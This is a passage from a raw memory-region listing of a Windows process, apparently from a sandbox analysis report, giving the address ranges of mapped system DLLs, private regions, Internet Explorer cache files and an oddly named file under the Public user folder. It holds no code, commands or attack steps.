start_va = 0x70dd0000 end_va = 0x70dd7fff entry_point = 0x70dd4119 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" Region: id = 507 start_va = 0x70e70000 end_va = 0x70ea5fff entry_point = 0x70e79dae region_type = mapped_file name = "AudioSes.dll" filename = "\\Windows\\System32\\AudioSes.dll" Region: id = 508 start_va = 0x70eb0000 end_va = 0x70eb3fff entry_point = 0x70eb1030 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" Region: id = 509 start_va = 0x70ec0000 end_va = 0x70eeffff entry_point = 0x70ec3c6b region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" Region: id = 510 start_va = 0x70ef0000 end_va = 0x70f21fff entry_point = 0x70ef37f1 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" Region: id = 511 start_va = 0x70f30000 end_va = 0x710c7fff entry_point = 0x70f312a1 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" Region: id = 512 start_va = 0x710d0000 end_va = 0x710e5fff entry_point = 0x710d1d6d region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" Region: id = 513 start_va = 0x71390000 end_va = 0x713e7fff entry_point = 0x713915c0 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" Region: id = 514 start_va = 0x713f0000 end_va = 0x71419fff entry_point = 0x713f10ed region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" Region: id = 515 start_va = 0x714b0000 end_va = 0x714b7fff entry_point = 0x714b2ca6 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" Region: id = 516 start_va = 0x714c0000 end_va = 0x71520fff entry_point = 0x714c3921 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" Region: id = 517 start_va = 0x71530000 end_va = 0x717a7fff entry_point = 0x71537416 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" Region: id = 518 start_va = 0x717b0000 end_va = 0x717b8fff entry_point = 0x717b153e region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" Region: id = 519 start_va = 0x717c0000 end_va = 0x717edfff entry_point = 0x717c1bba region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" Region: id = 520 start_va = 0x717f0000 end_va = 0x7183dfff entry_point = 0x7182816e region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" Region: id = 521 start_va = 0x71840000 end_va = 0x718b7fff entry_point = 0x71858b9b region_type = mapped_file name = "timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" Region: id = 522 start_va = 0x71950000 end_va = 0x71955fff entry_point = 0x71951140 region_type = mapped_file name = "IconCodecService.dll" filename = "\\Windows\\System32\\IconCodecService.dll" Region: id = 523 start_va = 0x71960000 end_va = 0x719cffff entry_point = 0x71961f65 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" Region: id = 524 start_va = 0x71a20000 end_va = 0x71a2afff entry_point = 0x71a21200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" Region: id = 525 start_va = 0x71a30000 end_va = 0x71a38fff entry_point = 0x71a311d0 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" Region: id = 526 start_va = 0x71a40000 end_va = 0x71aa9fff entry_point = 0x71a41abe region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" Region: id = 527 start_va = 0x71ab0000 end_va = 0x71ae0fff entry_point = 0x71aba8b6 region_type = mapped_file name = "EhStorShell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" Region: id = 528 start_va = 0x71af0000 end_va = 0x71b3bfff entry_point = 0x71af2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" Region: id = 529 start_va = 0x71b40000 end_va = 0x71caefff entry_point = 0x71b4d50e region_type = mapped_file name = "ExplorerFrame.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" Region: id = 530 start_va = 0x72100000 end_va = 0x72111fff entry_point = 0x72103271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" Region: id = 531 start_va = 0x72120000 end_va = 0x7212cfff entry_point = 0x72122012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" Region: id = 532 start_va = 0x72140000 end_va = 0x7218efff entry_point = 0x72159f22 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" Region: id = 533 start_va = 0x72190000 end_va = 0x721cbfff entry_point = 0x72193089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" Region: id = 534 start_va = 0x72300000 end_va = 0x72306fff entry_point = 0x7230128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" Region: id = 535 start_va = 0x72310000 end_va = 0x7232bfff entry_point = 0x7231a431 region_type = mapped_file name = "IPHLPAPI.DLL" filename = "\\Windows\\System32\\IPHLPAPI.DLL" Region: id = 536 start_va = 0x73530000 end_va = 0x7357efff entry_point = 0x73531452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" Region: id = 537 start_va = 0x73580000 end_va = 0x735d7fff entry_point = 0x735813b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" Region: id = 538 start_va = 0x736c0000 end_va = 0x73706fff entry_point = 0x736d89f9 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" Region: id = 539 start_va = 0x73710000 end_va = 0x73719fff entry_point = 0x73714d20 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" Region: id = 540 start_va = 0x73770000 end_va = 0x737ecfff entry_point = 0x7377166a region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" Region: id = 541 start_va = 0x73800000 end_va = 0x73813fff entry_point = 0x73801da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" Region: id = 542 start_va = 0x73850000 end_va = 0x7385ffff entry_point = 0x738538c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" Region: id = 543 start_va = 0x739c0000 end_va = 0x739e0fff entry_point = 0x739c145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" Region: id = 544 start_va = 0x73b20000 end_va = 0x73b2efff entry_point = 0x73b2125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" Region: id = 545 start_va = 0x73b30000 end_va = 0x73b3efff entry_point = 0x73b312a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" Region: id = 546 start_va = 0x73b40000 end_va = 0x73b48fff entry_point = 0x73b415a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" Region: id = 547 start_va = 0x73c50000 end_va = 0x73c5cfff entry_point = 0x73c511e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" Region: id = 548 start_va = 0x73c70000 end_va = 0x73d6afff entry_point = 0x73c817e1 region_type = mapped_file name = "WindowsCodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" Region: id = 549 start_va = 0x73d70000 end_va = 0x73d9efff entry_point = 0x73d71142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" Region: id = 550 start_va = 0x73da0000 end_va = 0x73db2fff entry_point = 0x73da1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" Region: id = 551 start_va = 0x73dc0000 end_va = 0x73dc8fff entry_point = 0x73dc1120 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" Region: id = 552 start_va = 0x73dd0000 end_va = 0x73e07fff entry_point = 0x73dd138b region_type = mapped_file name = "SndVolSSO.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" Region: id = 553 start_va = 0x73e10000 end_va = 0x73e3efff entry_point = 0x73e1c7a2 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" Region: id = 554 start_va = 0x73e40000 end_va = 0x73ef1fff entry_point = 0x73e916fd region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" Region: id = 555 start_va = 0x73f00000 end_va = 0x7408ffff entry_point = 0x73f9d026 region_type = mapped_file name = "GdiPlus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" Region: id = 556 start_va = 0x74090000 end_va = 0x740cffff entry_point = 0x7409a2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" Region: id = 557 start_va = 0x740d0000 end_va = 0x740e1fff entry_point = 0x740d4795 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" Region: id = 558 start_va = 0x740f0000 end_va = 0x7410dfff entry_point = 0x740f1369 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" Region: id = 559 start_va = 0x74110000 end_va = 0x742adfff entry_point = 0x7413e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" Region: id = 560 start_va = 0x742b0000 end_va = 0x743a7fff entry_point = 0x742b1689 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" Region: id = 561 start_va = 0x743b0000 end_va = 0x74566fff entry_point = 0x743bae9d region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" Region: id = 562 start_va = 0x74590000 end_va = 0x74596fff entry_point = 0x745910c0 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" Region: id = 563 start_va = 0x745a0000 end_va = 0x74694fff entry_point = 0x745b0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" Region: id = 564 start_va = 0x746a0000 end_va = 0x746d8fff entry_point = 0x746ae2de region_type = mapped_file name = "MMDevAPI.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" Region: id = 565 start_va = 0x746e0000 end_va = 0x74704fff entry_point = 0x746e2b71 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" Region: id = 566 start_va = 0x748a0000 end_va = 0x748a8fff entry_point = 0x748a1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" Region: id = 567 start_va = 0x74a00000 end_va = 0x74a16fff entry_point = 0x74a01c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" Region: id = 568 start_va = 0x74af0000 end_va = 0x74af7fff entry_point = 0x74af34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" Region: id = 569 start_va = 0x74bc0000 end_va = 0x74bfafff entry_point = 0x74bc128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" Region: id = 570 start_va = 0x74e20000 end_va = 0x74e35fff entry_point = 0x74e22dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" Region: id = 571 start_va = 0x74fe0000 end_va = 0x75021fff entry_point = 0x74fe1360 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" Region: id = 572 start_va = 0x751f0000 end_va = 0x75208fff entry_point = 0x751f1319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" Region: id = 573 start_va = 0x75260000 end_va = 0x75267fff entry_point = 0x752610e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" Region: id = 574 start_va = 0x75280000 end_va = 0x7529afff entry_point = 0x752893b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" Region: id = 575 start_va = 0x752a0000 end_va = 0x752abfff entry_point = 0x752a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" Region: id = 576 start_va = 0x752b0000 end_va = 0x7530efff entry_point = 0x752b2134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" Region: id = 577 start_va = 0x75310000 end_va = 0x75338fff entry_point = 0x75316b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" Region: id = 578 start_va = 0x75340000 end_va = 0x7534dfff entry_point = 0x75341235 region_type = mapped_file name = "RpcRtRemote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" Region: id = 579 start_va = 0x75350000 end_va = 0x7535afff entry_point = 0x75351992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" Region: id = 580 start_va = 0x753c0000 end_va = 0x753cbfff entry_point = 0x753c238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" Region: id = 581 start_va = 0x753d0000 end_va = 0x754ecfff entry_point = 0x753d158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" Region: id = 582 start_va = 0x754f0000 end_va = 0x75501fff entry_point = 0x754f1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" Region: id = 583 start_va = 0x75510000 end_va = 0x75559fff entry_point = 0x75517de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 584 start_va = 0x75560000 end_va = 0x7558cfff entry_point = 0x7556296d region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" Region: id = 585 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x755958b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" Region: id = 586 start_va = 0x75650000 end_va = 0x75744fff entry_point = 0x75651865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" Region: id = 587 start_va = 0x757d0000 end_va = 0x75814fff entry_point = 0x757d11e1 region_type = mapped_file name = "Wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" Region: id = 588 start_va = 0x75830000 end_va = 0x758fbfff entry_point = 0x7583168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 589 start_va = 0x75900000 end_va = 0x759d3fff entry_point = 0x7594bde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 590 start_va = 0x759e0000 end_va = 0x76629fff entry_point = 0x75a61601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" Region: id = 591 start_va = 0x76630000 end_va = 0x7664efff entry_point = 0x76631355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 592 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x766649e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 593 start_va = 0x766f0000 end_va = 0x7688cfff entry_point = 0x766f17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" Region: id = 594 start_va = 0x76890000 end_va = 0x76a8afff entry_point = 0x768922d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" Region: id = 595 start_va = 0x76a90000 end_va = 0x76bebfff entry_point = 0x76adba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" Region: id = 596 start_va = 0x76bf0000 end_va = 0x76c90fff entry_point = 0x76c22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 597 start_va = 0x76ca0000 end_va = 0x76d68fff entry_point = 0x76cbd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 598 start_va = 0x76d70000 end_va = 0x76dc6fff entry_point = 0x76d89ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" Region: id = 599 start_va = 0x76dd0000 end_va = 0x76e1dfff entry_point = 0x76dd9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 600 start_va = 0x76e20000 end_va = 0x76ea2fff entry_point = 0x76e223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" Region: id = 601 start_va = 0x76ee0000 end_va = 0x76f6efff entry_point = 0x76ee3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" Region: id = 602 start_va = 0x76f70000 end_va = 0x7701bfff entry_point = 0x76f7a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 603 start_va = 0x77020000 end_va = 0x770bcfff entry_point = 0x77053fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 604 start_va = 0x770c0000 end_va = 0x771f5fff entry_point = 0x770c1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" Region: id = 605 start_va = 0x77200000 end_va = 0x7733bfff entry_point = 0x77200000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 606 start_va = 0x77340000 end_va = 0x77345fff entry_point = 0x77341782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" Region: id = 607 start_va = 0x77350000 end_va = 0x77359fff entry_point = 0x7735136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 608 start_va = 0x77360000 end_va = 0x77364fff entry_point = 0x77361438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" Region: id = 609 start_va = 0x773d0000 end_va = 0x773e8fff entry_point = 0x773d4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 610 start_va = 0x773f0000 end_va = 0x77424fff entry_point = 0x773f145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" Region: id = 611 start_va = 0x77440000 end_va = 0x77440fff entry_point = 0x77440000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 612 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 613 start_va = 0x7ff9c000 end_va = 0x7ff9cfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9c000" filename = "" Region: id = 614 start_va = 0x7ff9d000 end_va = 0x7ff9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9d000" filename = "" Region: id = 615 start_va = 0x7ff9e000 end_va = 0x7ff9efff entry_point = 0x0 region_type = private name = "private_0x000000007ff9e000" filename = "" Region: id = 616 start_va = 0x7ff9f000 end_va = 0x7ff9ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff9f000" filename = "" Region: id = 617 start_va = 0x7ffa0000 end_va = 0x7ffa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa0000" filename = "" Region: id = 618 start_va = 0x7ffa1000 end_va = 0x7ffa1fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa1000" filename = "" Region: id = 619 start_va = 0x7ffa2000 end_va = 0x7ffa2fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa2000" filename = "" Region: id = 620 start_va = 0x7ffa3000 end_va = 0x7ffa3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa3000" filename = "" Region: id = 621 start_va = 0x7ffa4000 end_va = 0x7ffa4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa4000" filename = "" Region: id = 622 start_va = 0x7ffa5000 end_va = 0x7ffa5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa5000" filename = "" Region: id = 623 start_va = 0x7ffa6000 end_va = 0x7ffa6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 624 start_va = 0x7ffa7000 end_va = 0x7ffa7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 625 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 626 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 627 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 628 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 629 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 630 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 631 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 632 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 633 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 634 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 635 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 636 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 637 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 638 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 639 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 640 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 641 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 642 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 643 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 644 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 645 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 646 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 647 start_va = 0x5690000 end_va = 0x56cffff entry_point = 0x0 region_type = private name = "private_0x0000000005690000" filename = "" Region: id = 648 start_va = 0x6670000 end_va = 0x66e4fff entry_point = 0x6670000 region_type = mapped_file name = "N3Eg4.51N3E" filename = "\\Users\\Public\\N3Eg\\N3Eg4.51N3E" Region: id = 649 start_va = 0x7ff9b000 end_va = 0x7ff9bfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9b000" filename = "" Region: id = 650 start_va = 0x6770000 end_va = 0x686ffff entry_point = 0x0 region_type = private name = "private_0x0000000006770000" filename = "" Region: id = 652 start_va = 0x68c0000 end_va = 0x68fffff entry_point = 0x0 region_type = private name = "private_0x00000000068c0000" filename = "" Region: id = 653 start_va = 0x6900000 end_va = 0x6b92fff entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 654 start_va = 0x6ba0000 end_va = 0x6e3bfff entry_point = 0x0 region_type = private name = "private_0x0000000006ba0000" filename = "" Region: id = 655 start_va = 0x6e40000 end_va = 0x70dffff entry_point = 0x0 region_type = private name = "private_0x0000000006e40000" filename = "" Region: id = 656 start_va = 0x7ff9a000 end_va = 0x7ff9afff entry_point = 0x0 region_type = private name = "private_0x000000007ff9a000" filename = "" Region: id = 657 start_va = 0x70e0000 end_va = 0x721ffff entry_point = 0x0 region_type = private name = "private_0x00000000070e0000" filename = "" Region: id = 658 start_va = 0x4fe0000 end_va = 0x4fe0fff entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 659 start_va = 0x6e100000 end_va = 0x6e118fff entry_point = 0x6e102754 region_type = mapped_file name = "olepro32.dll" filename = "\\Windows\\System32\\olepro32.dll" Region: id = 660 start_va = 0x4ff0000 end_va = 0x4ffffff entry_point = 0x0 region_type = private name = "private_0x0000000004ff0000" filename = "" Region: id = 661 start_va = 0x6f9b0000 end_va = 0x6f9b2fff entry_point = 0x6f9b0000 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" Region: id = 662 start_va = 0x5000000 end_va = 0x5013fff entry_point = 0x5000000 region_type = mapped_file name = "index.dat" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" Region: id = 663 start_va = 0x53e0000 end_va = 0x53e7fff entry_point = 0x53e0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\DSsDPMx042\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" Region: id = 664 start_va = 0x53f0000 end_va = 0x53fbfff entry_point = 0x53f0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" Region: id = 665 start_va = 0x75820000 end_va = 0x75822fff entry_point = 0x75820000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" Region: id = 666 start_va = 0x721e0000 end_va = 0x72217fff entry_point = 0x721e990e region_type = mapped_file name = "FWPUCLNT.DLL" filename = "\\Windows\\System32\\FWPUCLNT.DLL" Region: id = 667 start_va = 0x72e0000 end_va = 0x731ffff entry_point = 0x0 region_type = private name = "private_0x00000000072e0000" filename = "" Region: id = 668 start_va = 0x6e0f0000 end_va = 0x6e0fafff entry_point = 0x6e0f34a0 region_type = mapped_file name = "idndl.dll" filename = "\\Windows\\System32\\idndl.dll" Region: id = 669 start_va = 0x74de0000 end_va = 0x74e1bfff entry_point = 0x74de145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" Region: id = 670 start_va = 0x74930000 end_va = 0x74934fff entry_point = 0x749315df region_type = mapped_file name = "WSHTCPIP.DLL" filename = "\\Windows\\System32\\WSHTCPIP.DLL" Region: id = 671 start_va = 0x7450000 end_va = 0x748ffff entry_point = 0x0 region_type = private name = "private_0x0000000007450000" filename = "" Region: id = 672 start_va = 0x74ca0000 end_va = 0x74ce3fff entry_point = 0x74cb63f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" Region: id = 673 start_va = 0x72350000 end_va = 0x72355fff entry_point = 0x723514b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" Region: id = 674 start_va = 0x74dd0000 end_va = 0x74dd5fff entry_point = 0x74dd1673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" Region: id = 675 start_va = 0x1e10000 end_va = 0x1e11fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e10000" filename = "" Region: id = 676 start_va = 0x33a0000 end_va = 0x33dffff entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 677 start_va = 0x6cfe0000 end_va = 0x6d0f9fff entry_point = 0x6cfef0d7 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" Region: id = 678 start_va = 0x6d620000 end_va = 0x6d639fff entry_point = 0x6d62b473 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" Region: id = 679 start_va = 0x6d930000 end_va = 0x6d93efff entry_point = 0x6d931371 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" Region: id = 680 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 839 start_va = 0x6ceb0000 end_va = 0x6cec1fff entry_point = 0x6ceb140e region_type = mapped_file name = "wercplsupport.dll" filename = "\\Windows\\System32\\wercplsupport.dll" Region: id = 840 start_va = 0x6ced0000 end_va = 0x6cfd5fff entry_point = 0x6ced2af9 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" Region: id = 841 start_va = 0x6d5e0000 end_va = 0x6d614fff entry_point = 0x6d5e13d5 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" Region: id = 842 start_va = 